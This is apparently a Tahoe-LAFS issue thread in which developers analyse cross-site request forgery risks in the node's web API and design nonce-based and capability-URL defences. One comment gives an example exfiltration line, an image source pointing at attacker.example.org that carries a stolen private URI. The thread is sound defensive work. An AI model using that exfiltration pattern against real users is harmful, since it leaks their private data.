Web API is vulnerable to XSRF attacks. #98

Closed
opened 2007-08-10 21:04:58 +00:00 by nejucomo · 19 comments
nejucomo commented 2007-08-10 21:04:58 +00:00
Owner

the current web-api is susceptible to cross-site request forgery (XSRF) attacks [1].

An example attack scenario looks like this: the attacker expects the victim to be a Tahoe user, wants to read their hard drive, and knows they have a fetish for nuclear warhead HOWTO / porn mashups.

So they create NudieNukeHOWTOS.com and put up an enticing link whose URL target PUTs the user's root directory to Tahoe.

Preventing this kind of attack requires (I believe) that users cannot cut'n'paste URLs into their browser to initiate Tahoe actions. This might explicitly be counter to the design goals. A workaround is to require the users to cut'n'paste into an entry form within the web UI (see below).

One technical solution is for the Web UI and API to associate an unguessable string with each action-triggering URL. These strings are provided to the browser (such as with a hidden input field) or the webapi client (perhaps in a header) and verified before executing actions.

If we want the use case of Alice sending Bob an email that says: "Hey download my great Tahoe photo directory with this URI: ...", we can require Bob to paste this string into an input field in the Web UI instead of the location bar. (Even this might be vulnerable... I'm not sure of the capabilities of javascript and the like...)

References:
[1] http://en.wikipedia.org/wiki/XSRF
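The "unguessable string" idea above can be sketched as follows. This is only an illustration of the technique, not anything in the actual webapi; all names (`SESSION_SECRET`, `make_action_token`, etc.) are hypothetical:

```python
import hashlib
import hmac
import secrets

# Sketch only: the node holds one secret per process; each action-triggering
# URL gets a derived unguessable string, delivered to the browser in a hidden
# form field (or to a webapi client in a header) and verified before the
# action is executed.
SESSION_SECRET = secrets.token_bytes(32)

def make_action_token(action_url: str) -> str:
    """Derive an unguessable string bound to one action-triggering URL."""
    return hmac.new(SESSION_SECRET, action_url.encode(), hashlib.sha256).hexdigest()

def verify_action_token(action_url: str, token: str) -> bool:
    """Constant-time comparison; the request is refused on mismatch."""
    return hmac.compare_digest(make_action_token(action_url), token)

# A page served by an attacker never sees SESSION_SECRET, so it cannot
# forge a valid token for any action URL.
token = make_action_token("/vdrive/private/photos")
assert verify_action_token("/vdrive/private/photos", token)
assert not verify_action_token("/vdrive/private/other", token)
```

Binding the token to the specific URL (rather than issuing one global token) also prevents an attacker from replaying a token they observed for one harmless action against a different, destructive one.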

tahoe-lafs added the
code
minor
defect
0.4.0
labels 2007-08-10 21:04:58 +00:00
tahoe-lafs added this to the undecided milestone 2007-08-10 21:04:58 +00:00
warner commented 2007-08-10 23:09:49 +00:00
Author
Owner

Hm. I believe that browsers can't do PUT or DELETE (only GET and POST), so
this might be a good argument for not having the localfile= argument on those
methods (certainly on GET, since anyone can make you do a GET, but that's why
GET is never supposed to have side effects anyways).

So if GETs are side-effect free, and the javascript same-origin policy
prevents other site's javascript from reading your local data, and browsers
can't do PUT or DELETE, then I think the only attack vectors left are POSTs.

That would mean the attack is my web page which has a form on it with an
action that points at your local tahoe node and does something (like use
localfile= to upload files from your disk into the vdrive somewhere that I
can read them, or perhaps just cause your node to delete your root
directory). This strikes me as a more general problem.. pretty much every
large web site out there has actions that are triggered by form POSTs.. how
do they protect against other sites pointing forms their way? Do browsers
complain if the form you serve doesn't point back at your own site? How do
others deal with this?

Ohh.. but at the moment, the localfile= form of GET does have side-effects,
namely writing to your local disk. So an attacker could easily cause you to
modify your local filesystem. I had thought I'd put in some weak protection
against the most obvious exploits of this (refuse to overwrite existing
files), but in looking through the code, it seems that I'm remembering
incorrectly.

So at the very least, we need to remove the localfile= form of GET.

warner commented 2007-08-11 01:56:54 +00:00
Author
Owner

I've disabled the localfile= form of GET and PUT in changeset:42f8e574169b87a7, and you must touch a special file named webport_allow_localfile in the node's basedir to reenable them. (they're awfully useful for testing, so I didn't want to get rid of the feature completely).

So that takes care of any localfile= issues. What's left?

zooko commented 2007-08-13 17:09:46 +00:00
Author
Owner

I'd like for somebody to review this issue before we release v0.5. Assigning it to Nejucomo.

tahoe-lafs modified the milestone from undecided to 0.5.0 2007-08-13 17:09:46 +00:00
tahoe-lafs added
major
and removed
minor
labels 2007-08-13 17:10:13 +00:00
tahoe-lafs added
code-frontend-web
and removed
code
labels 2007-08-14 18:54:07 +00:00
zooko commented 2007-08-15 15:47:14 +00:00
Author
Owner

I think Brian is right that this is a very general problem in web sites/web services. For example if you visit this web page while you are logged into your amazon account, it will add a book to your amazon shopping cart:

http://shiflett.org/amazon.php

The capabilities perspective on XSRF attacks is that they are Confused Deputy Attacks. That is: your client (the web browser) is asking the server (the tahoe node or the amazon web server) to do X, and the web browser has the authority to do X, but the web browser shouldn't have used that authority at that time.

This happens because the authority is "ambient" within the scope of a "session" or a cookie or some other such authorization scope -- whatever requests are made within that scope are made with all of the client's authority.

For example, when amazon receives a request from your web browser to add a book to your shopping cart, it decides whether to honor the request based on whether your web browser is currently "logged in" to amazon. When a tahoe node receives a POST from your web browser to alter your vdrive, the tahoe node decides whether to honor the request based on whether the browser has authenticated (I guess -- I don't understand how or if we currently do authentication). The problem is that the browser is not used solely for that one purpose (amazon shopping or tahoe usage), so if the other purposes for which it is used lead to the user clicking on a link that was influenced by an attacker, this kind of attack can succeed.

A capabilities-inspired solution to this problem would be to make a narrower authorization. For example, below I elaborate on nejucomo's "unguessable string" suggestion:

When the tahoe node starts up, it emits a URL containing an unguessable random string into a file in its dir. The user has to cut and paste that URL into her web browser in order to use the tahoe node. For the duration of this run of the node process, it requires that same unguessable random string to be present in all HTTP requests that it receives. With this scheme, then even if the user uses their web browser for other purposes at the same time as they use it for tahoe, and even if a malicious person gives them a hyperlink that was designed to abuse their tahoe authorities, or even if they load a web page containing javascript like the "amazon.php" attack referenced above, then the malicious person can't cause them to use their tahoe authorities since the malicious person doesn't know the unguessable string.

Is that right so far?

I believe nejucomo has recently studied this topic and he may have a better idea.
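The scheme described above can be sketched like this. The file name (`node.url`) and URL layout are my own invention for illustration, not what the node actually writes:

```python
import os
import secrets
import tempfile

# Sketch of the scheme: at startup the node writes a URL containing an
# unguessable random string into a file in its base directory, and
# thereafter refuses any HTTP request that does not carry that same string
# as the first path component.
def write_start_url(basedir: str, port: int = 8080) -> str:
    nonce = secrets.token_urlsafe(16)
    with open(os.path.join(basedir, "node.url"), "w") as f:
        f.write("http://localhost:%d/%s/\n" % (port, nonce))
    return nonce

def request_allowed(nonce: str, request_path: str) -> bool:
    """Accept the request only if its first path component is the nonce."""
    first = request_path.lstrip("/").split("/", 1)[0]
    return secrets.compare_digest(first, nonce)

basedir = tempfile.mkdtemp()
nonce = write_start_url(basedir)
assert request_allowed(nonce, "/%s/vdrive/private/photos" % nonce)
assert not request_allowed(nonce, "/guessed/vdrive/private/photos")
```

Since the string lives only in the node's basedir and in the user's location bar, a malicious page has no way to construct a link or form that passes the check.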

zooko commented 2007-08-15 15:48:12 +00:00
Author
Owner

I'm starting to have confidence that the webapi that we have now is good enough/safe enough for v0.5. I still would like for nejucomo to look at it for a few minutes just to see if there is something that could be a serious issue in the short term.

warner commented 2007-08-15 17:21:32 +00:00
Author
Owner

I like the nonce idea. Several people have pointed out that URLs are leaky
(referrer headers, anti-phishing toolbars, etc), but I think having the
authority embedded in the URL is a lot better than having it be ambient in
the browser.

If the nonce is stable over time, then users can bookmark their favorite
sites. If not (if each session generates a new one or something), then if we
want to do password-based authentication on the local system (or maybe even a
remote system, although URLs get a lot leakier when you tell someone else
about them..) then we could arrange for an old nonce to ask for
authentication in some non-ambient-authority-creating way and then bounce you
to the new nonce, i.e. http://LOCALHOST/NONCE1/path sends you to
http://LOCALHOST/login?path_when_done=path which asks for a password then
sends you to http://LOCALHOST/NONCE2/path .

The nonce in this scenario represents authority to access the user's entire
vdrive: that is a good thing and a bad thing. The good thing is that it means
the user can navigate to parent directories and generally get random-access
to their whole vdrive. The bad thing is that they can't safely share web
access to a limited portion of the vdrive (but that's what the "here's the
URI you should share with someone else" link is for).

How about this for a post-0.5.0 release?:

  • we create a persistent nonce the first time the webapi port is used
  • write that to disk in a human-readable format in a well-known file
  • change the welcome page to replace "click here to visit your vdrive" links
    with a small form
    • the form tells you the full pathname to the nonce file, and tells you
      to paste the nonce into this box
    • the form has one button for "visit my personal vdrive" and a second for
      "visit the global vdrive".
    • the code behind the form just redirects you to a URL that has the nonce
      added as a prefix
  • we also change the directory.xhtml page to make the "go back to the
    Welcome Page" link go up one more level, to get over the nonce part of
    the URL

This would deny local vdrive access to the providers of remote pages (those
who do not know the nonce), but still leave an affordance for a local user to
hit a simple (non-random) web page and receive instructions on how to access
their vdrive. I think it makes access to the vdrive equivalent to access to
the node's basedir, which is exactly the correspondence we want.
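The persistent-nonce bootstrap described above can be sketched as follows (the file name `webapi_nonce` and the URL layout are hypothetical, not the real implementation):

```python
import os
import secrets
import tempfile

# Sketch of the plan: a persistent nonce is created the first time the
# webapi port is used, written to a well-known file in the node's basedir,
# and the welcome-page form simply redirects to a nonce-prefixed URL.
NONCE_FILE = "webapi_nonce"

def get_or_create_nonce(basedir: str) -> str:
    """Create a persistent nonce on first use, then reuse it."""
    path = os.path.join(basedir, NONCE_FILE)
    if not os.path.exists(path):
        with open(path, "w") as f:
            f.write(secrets.token_urlsafe(16))
    with open(path) as f:
        return f.read().strip()

def form_redirect(pasted_nonce: str, which: str) -> str:
    """The code behind the form just prefixes the nonce onto the target."""
    target = {"personal": "/vdrive/private", "global": "/vdrive/global"}[which]
    return "/" + pasted_nonce.strip() + target

basedir = tempfile.mkdtemp()
nonce = get_or_create_nonce(basedir)
assert get_or_create_nonce(basedir) == nonce  # stable across restarts
assert form_redirect(nonce, "global") == "/%s/vdrive/global" % nonce
```

Because the nonce is stable, bookmarks keep working; anyone who can read the file already has access to the node's basedir, which is the intended equivalence.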

tahoe-lafs modified the milestone from 0.5.0 to 0.6.0 2007-08-15 18:33:27 +00:00
warner commented 2007-08-16 18:38:55 +00:00
Author
Owner

robk mentioned a technique they used back at Yahoo involving "crumbs", and has promised to add a note here with some details.

nejucomo commented 2007-08-20 19:45:51 +00:00
Author
Owner

I don't see the need for the complicated bootstrapping procedure when using noncey URLs. We may be able to preserve some user-friendliness while preventing XSRF attacks.

For instance, if the user is authenticated with a persistent cookie, we could provide the main top-level page without requiring a nonce. This would be safe as long as loading this page causes no Tahoe operations to be performed. This page would insert the nonce into each link it exposes.

Thus, an XSRF attack could only direct a user to the main page, but could not perform actions. The benefit here is that the user can bookmark the main page, or type it in, or follow a link on an instructional page.
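A minimal sketch of this proposal (all names hypothetical): the top-level page performs no Tahoe operations itself, and only embeds a fresh nonce into each action link it serves, so merely steering a victim to this page gains an attacker nothing.

```python
import secrets

def render_main_page(links):
    """Serve the bare main page; every action link gets the nonce baked in."""
    nonce = secrets.token_urlsafe(16)
    anchors = ['<a href="/%s%s">%s</a>' % (nonce, path, name)
               for name, path in links]
    return nonce, "\n".join(anchors)

nonce, html = render_main_page([("photos", "/vdrive/private/photos")])
assert ("/%s/vdrive/private/photos" % nonce) in html
```

Note the caveat raised in the discussion below: this only holds if an attacker cannot fetch and parse the main page cross-origin to extract the nonce.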

zooko commented 2007-08-20 20:56:27 +00:00
Author
Owner

See related issue in ticket #52.

zooko commented 2007-08-21 22:09:34 +00:00
Author
Owner

As per this discussion:

http://allmydata.org/pipermail/tahoe-dev/2007-August/000108.html

I intend to fix this ASAP and build a v0.5.1 release.

zooko commented 2007-08-21 23:13:05 +00:00
Author
Owner

Brian and I discussed nejucomo's simplification on IRC and we don't get it: couldn't javascript-enabled attackers fetch the welcome page, parse it, and then attack the user's data?

Oh, but non-javascript-enabled attackers couldn't.

Am I right?

nejucomo commented 2007-08-22 19:46:12 +00:00
Author
Owner

I'm not aware of a means for Javascript from host Malicious.com to fetch a page from TargetSite.com, parse it, and respond to it. But, I certainly wouldn't be surprised if that were possible. (My knowledge of Javascript and web front-end technologies is limited, but growing because of this issue.)

In the example attack, the only purpose of the Javascript is to conceal a POST. The same attack is possible without Javascript; the main difference is that the user must be tricked into clicking a "submit" button. (Who knows, perhaps with CSS or some such, the POST could be concealed without Javascript.) It's important not to be confused about Javascript's role here. It does not "cause" any web requests. It just decorates a normal request to make the nature of the attack more obscure.

Is it possible for an XSRF attack to send a GET request to Tahoe, then redirect from that page to a second attack site which somehow snarfs private Tahoe data? (For example, if the main page is unprotected with a nonce, but has links to protected pages, is it possible to cause the browser to load that page and reveal the secrets to the attacker?)

I don't think this is possible, which leads me to suggest we follow this principle:

XSRF Defence Principle: Any URL which initiates a Tahoe action, or any Tahoe page which causes browser actions without user interaction, must be protected with a shared secret. Any other Tahoe URL may be bare and unprotected by a secret (for user-friendliness).

So for instance, an unguarded URL should not accept any parameters whatsoever, but may have constrained side-effects (such as generating a new random nonce).

nejucomo commented 2007-08-22 20:10:34 +00:00
Author
Owner

So the most secure and least user-friendly solution I can imagine is this:

S1. There is one unguarded URL which serves up an authentication page (with a CAPTCHA for good measure).

S2. Whenever any page loads it generates a unique nonce for every Tahoe URL contained in that page.

S3. Tahoe maintains a table of noncey URLs and related actions. Each entry is removed after a single use, or after a given timeout. (This mitigates URL leakiness.)

This has several drawbacks: no bookmarks, no human modification of the location bar, lots of repeated authentications.

It sounds like the suggested deviations from this most-secure approach address different drawbacks with trade-offs:

A. Use a single persistent nonce, that is refreshed under certain (which?) conditions. This allows bookmarking and user location modification.

B. Use no authentication whatsoever on the "authentication page" (making it a simple portal). This removes the need for frequent authentication, but may be vulnerable to XSRF.

C. Make all inter-Tahoe UI actions and traversals into POSTs where the nonce is a hidden parameter. This is a user-friendliness feature. (This makes the URLs appear succinct and human readable, and the user or another site may link to a specific action. If the nonce is missing, they are redirected to a login page explaining which action is about to be performed.)

Are there other deviations from the "most secure" approach, or complete alternatives we should consider?
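The single-use, timed-out nonce table of S2/S3 can be sketched like this (class and method names are my own, for illustration only):

```python
import secrets
import time

# Sketch of S3: a table mapping noncey URLs to actions. Each entry is
# removed after a single use, or considered dead after a timeout, which
# mitigates URL leakiness (a leaked nonce is useless once spent or stale).
class NonceTable:
    def __init__(self, timeout: float = 300.0):
        self.timeout = timeout
        self.table = {}  # nonce -> (action, issue_time)

    def issue(self, action: str) -> str:
        """Mint a fresh nonce for one specific action (S2)."""
        nonce = secrets.token_urlsafe(16)
        self.table[nonce] = (action, time.monotonic())
        return nonce

    def redeem(self, nonce: str):
        """Return the action for a live nonce, or None; single use."""
        entry = self.table.pop(nonce, None)  # removed on first lookup
        if entry is None:
            return None
        action, issued = entry
        if time.monotonic() - issued > self.timeout:
            return None  # expired before use
        return action

table = NonceTable()
n = table.issue("delete /vdrive/private/photos")
assert table.redeem(n) == "delete /vdrive/private/photos"
assert table.redeem(n) is None  # second use is refused
```

This makes the drawbacks concrete: a bookmarked URL is a stored nonce, and it dies as soon as it is used once or the timeout passes.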

warner commented 2007-08-23 00:24:06 +00:00
Author
Owner

After chatting with zooko about secrets, I've implemented the following change:

  • remove /vdrive/private from the web API
  • create a "start.html" file in BASEDIR at node startup, containing a brief
    welcome message and links to the following:
    • the welcome page (just a simple http://localhost:8080/ link)
    • the public vdrive (/vdrive/global)
    • the URI-based private vdrive root (/uri/$PRIVATE_URI)

This accomplishes the basic goal: making access to the private vdrive
contingent upon knowing something secret. An attacker who can get control of
the browser via any http-sourced page will be unable to learn
$PRIVATE_URI, so they won't be able to access or modify anything through it.
XSRF attacks against /vdrive/global are still possible, but the attacker
could just as easily modify the public vdrive through their own node: they
get no additional abilities by using the victim's node.

The concern with javascript is an XSS thing: the assumption is that a page
served by a "trusted" server will contain content under the control of the
attacker, specifically a piece of javascript that runs in the context of the
"trusted" page. This JS is then able to make HTTP requests (via the usual
XMLHttpRequest mechanism used for AJAXy stuff) to anything from the same
server, and those requests will be accompanied with any host-specific
authority-bearing cookies.

Plain HTML is a concern as well, as nejucomo's example shows, when the POST
or GET has side-effects. Plain HTML has no way to take the information it has
learned and share it with others, whereas an active attack (javascript) does.

In our case, the XSS attack to be concerned about is one against the
authority contained in the URL, specifically that /uri/$PRIVATE_URI portion.
If an attacker can convince you to attach an .html file to your private
vdrive somewhere and then view it, any javascript in that file gets control.
It can read the current URL, extract the $PRIVATE_URI portion, then reveal
that data to an external server (say, by changing the src= on an embedded
IMG tag to refer to
http://attacker.example.org/0wned.jpg?secret=$PRIVATE_URI).

To mitigate this problem, the next change I'm about to make is to modify the
way that we present certain files in the web directory view to remove the
authority from the URL. In each directory, we present a list of child names
as hyperlinks, either to another directory or to the file attached to that
name. With this change, the hyperlinks for files will point at
/uri/$FILE_URI?t=$FILENAME instead of pointing at .../$FILENAME . The effect
of this will be that the javascript/etc will still run, but there will be
nothing interesting or secret left in the URL that it can usefully reveal.

This addresses another problem, URL leakage through Referrer headers. If the
user follows any hyperlink present on a /uri/$PRIVATE_URI page, that request
will carry the page's URL in the Referrer header, revealing the secret to the
new web server. By ensuring that all HTML content renders in a different page
(with no authority in the URL), this problem is fixed.

I'm planning to leave the .../file.html URL working (so that simple 'wget'
operations like /uri/$PRIVATE_URI/subdir/foo.html still work and don't mangle
the downloaded filename). This change will only cause the directory node
navigation page to provide alternative HREFs for children which are files.
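The link-rewriting change described above can be sketched as follows (the helper name is mine; the real directory view is rendered from directory.xhtml):

```python
from urllib.parse import quote

# Sketch: directory listings keep path-based hyperlinks for subdirectories,
# but point file hyperlinks at the /uri/$FILE_URI?t=$FILENAME form. A file
# then renders at a URL that carries no authority over the parent directory
# or the private vdrive root, so hostile javascript inside it has nothing
# secret to extract from the location bar or leak via Referrer headers.
def child_href(dir_url: str, name: str, child_uri: str, is_dir: bool) -> str:
    if is_dir:
        return dir_url.rstrip("/") + "/" + quote(name)
    return "/uri/%s?t=%s" % (quote(child_uri, safe=":"), quote(name))

assert child_href("/uri/DIRCAP/subdir", "foo.html", "URI:CHK:abc:def", False) \
    == "/uri/URI:CHK:abc:def?t=foo.html"
assert child_href("/uri/DIRCAP/subdir", "nested", "", True) \
    == "/uri/DIRCAP/subdir/nested"
```

The file's own URI is still present in the link, but that only grants authority over that one file, which the viewer necessarily has anyway.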

warner commented 2007-08-23 00:41:43 +00:00
Author
Owner

I've just pushed the second change I mentioned earlier, to present /uri-based
URLs for all files in the vdrive.

It could use some improvement, though; in particular, I'm displeased that the
URL you can cut-and-paste out of the HTML page ends in a big ugly hex string,
such that when you pass it to 'wget', you get a file on disk with a useless
big name.

I think I want to implement a URL which contains the Tahoe file URI as the
second-to-last component, but then contains the desired filename as the last
component, like <http://localhost:8080/uri/$URI/foo.jpg>. The server would
deliver the same file no matter what name you tack on the end, but this way
tools like wget could use a sensible name instead of $URI.

Our present webapi doesn't accommodate this, though, since the /uri/$URI/ form
can refer to directories too, in which case /uri/$URI/foo.jpg really means to
look inside the directory referenced by $URI for a child named foo.jpg and
serve that. So we need a new URL space, maybe /download or /download-uri
or /uri-file or something.
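Server-side, the proposed scheme could be parsed along these lines (a sketch only; `/uri-file` is just one of the names floated above, and the helper is hypothetical): the cap comes from the second-to-last path component, and the trailing filename is ignored except as a download name.

```python
def parse_uri_file_url(path):
    """Split a hypothetical /uri-file/$URI/$FILENAME path (sketch).

    The server would serve the file identified by $URI regardless of
    the trailing name; the name exists only so that tools like wget
    have something sensible to save the file as.
    """
    parts = [p for p in path.split("/") if p]
    if len(parts) != 3 or parts[0] != "uri-file":
        raise ValueError("not a /uri-file/$URI/$FILENAME path: %r" % path)
    uri, filename = parts[1], parts[2]
    return uri, filename
```

Because the namespace is distinct from /uri/, there is no ambiguity with the directory-traversal meaning of /uri/$URI/foo.jpg.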

tahoe-lafs modified the milestone from 0.6.0 to 0.5.1 2007-08-23 00:42:38 +00:00
warner commented 2007-08-30 23:33:33 +00:00
Author
Owner

We released 0.5.1 a week ago. Are we happy enough with the fixes therein to close this ticket? I'd like to mark the trac 0.5.1 milestone as done, but this is the last ticket remaining.

zooko commented 2007-09-23 14:17:09 +00:00
Author
Owner

Whoops, I forgot to mark this as fixed in the v0.5.1 release.

I wish trac would send me e-mail. I suspect that my habit of "checking the TimeLine for new stuff" isn't good enough to notice all the trac events that I want to notice.

tahoe-lafs added the
fixed
label 2007-09-23 14:17:09 +00:00
zooko closed this issue 2007-09-23 14:17:09 +00:00
davidsarah commented 2009-10-28 03:51:46 +00:00
Author
Owner

Note that JavaScript in a given file can still obtain the read URI for that file. In the case of a mutable file, this is more than least authority because it allows reading future versions. I will open a new bug about that.

davidsarah commented 2009-10-28 04:04:29 +00:00
Author
Owner

New bug is #821.
